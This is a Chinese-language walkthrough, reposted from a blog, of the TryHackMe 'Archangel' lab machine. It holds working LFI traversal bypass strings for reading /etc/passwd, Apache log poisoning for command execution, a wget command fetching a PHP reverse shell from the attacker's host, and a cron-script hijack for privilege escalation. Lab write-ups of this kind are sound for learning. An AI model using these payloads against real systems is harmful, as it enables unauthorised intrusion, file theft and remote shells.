标签：文件 Archangel shell .. 端口 test 靶场 php TryHackMe

Archangel

Boot2root, Web exploitation, Privilege escalation, LFI

---

0x01 信息收集

常规端口扫一波，发现只有22和80端口开放   先从80端口入手，常规的扫目录没有发现有价值的东西   在源代码里发现一个可以的域名   网站找不到突破口，试着修改本地的hosts文件指向改域名，访问后获得第一个flag   在用gobuster扫描网站目录，得到test.php和robots.txt robots.txt里面指的也是test.php  

0x02 文件包含

打开test.php看路径像是有文件包含的漏洞   用php伪协议包含到test.php文件 php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php 分析源代码if需要满足两个条件没有../..和 /var/www/html/development_testing   根据条件读取/etc/passwd php://filter/resource=/var/www/html/development_testing/..//..//..//..//..//..//..//..//..//..//..//etc/passwd 也可以用.././.././绕过 ..%2f/..%2f/..%2f/也能绕过   尝试包含apache日志getshell   在User-Agent里插入phpinfo函数测试一下   成功解析

 

0x03 GetShell

插入system执行命令函数   给cmd传参成功执行，接下来就是用kali自带的php反向shell脚本getshell   修改文件的反向链接的地址和端口   用python3搭建一个简单的网站 python3 -m http.server 4444 执行函数用wget 下载脚本 wget http://10.10.220.123:4444/php-serverse-shell.php   下载成功后在同级目录下访问php-reverse-shell.php 访问前记得先用nc起监听  

0x04 权限提升

shell过来后准备提权，现先翻一下可以提权的脚本，发现/etc/crontab目录下有helloworld.sh以archanggel用户自动运行的脚本   过去看下是个自动运行的sh文件，具有可读可写权限。在文件后面添加反弹shell的命令。   稍等片刻便能获得archangel权限

标签：文件,Archangel,shell,..,端口,test,靶场,php,TryHackMe
来源： https://blog.csdn.net/qq_44101248/article/details/113957607

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。